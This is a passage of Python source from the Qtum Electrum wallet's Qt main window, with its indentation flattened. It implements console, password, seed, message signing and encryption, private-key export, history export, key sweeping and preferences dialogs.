vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self})
console.updateNamespace({'util': util, 'bitcoin': bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0] == '_' or m in ['network', 'wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from qtum_electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except (BaseException,) as e:
traceback.print_exc(file=sys.stdout)
self.show_error('{}:{}'.format(_('Failed to update password'), e))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _(
'Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
# if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
# return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
grid.addWidget(QLabel(_("Wallet type") + ':'), 0, 0)
grid.addWidget(QLabel(wallet_type), 0, 1)
grid.addWidget(QLabel(_("Script type") + ':'), 1, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 1, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key + 1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = ("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.")
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message('Invalid Qtum address.')
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message('Cannot sign messages with this type of address.' + '\n\n' + self.msg_sign)
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message('Address not in wallet.')
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message('Invalid Qtum address.')
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from qtum_electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from qtum_electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("qtum:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
# transactions are binary, but qrcode seems to return utf8...
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except (BaseException,) as e:
self.show_error((_('Could not decode QR code') + ':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from qtum_electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _(
'It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'qtum-electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(
lambda: e.setText("Please wait... %d/%d" % (len(private_keys), len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Qtum Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent=4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/qtum-electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet(BLACK_FG if get_address() else RED_FG)
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from qtum_electrum.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'))
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from qtum_electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
rbf_policy = self.config.get('rbf_policy', 1)
rbf_label = HelpLabel(_('Propose Replace-By-Fee') + ':', '')
rbf_combo = QComboBox()
rbf_combo.addItems([_('Always'), _('If the fee is low'), _('Never')])
rbf_combo.setCurrentIndex(rbf_policy)
def on_rbf(x):
self.config.set_key('rbf_policy', x)
rbf_combo.currentIndexChanged.connect(on_rbf)
fee_widgets.append((rbf_label, rbf_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
else:
alias_e.setStyleSheet(RED_BG)
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['QTUM', 'mQTUM', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1QTUM=1000mQTUM.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'QTUM':
self.decimal_point = 8
elif unit_result == 'mQTUM':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from qtum_electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
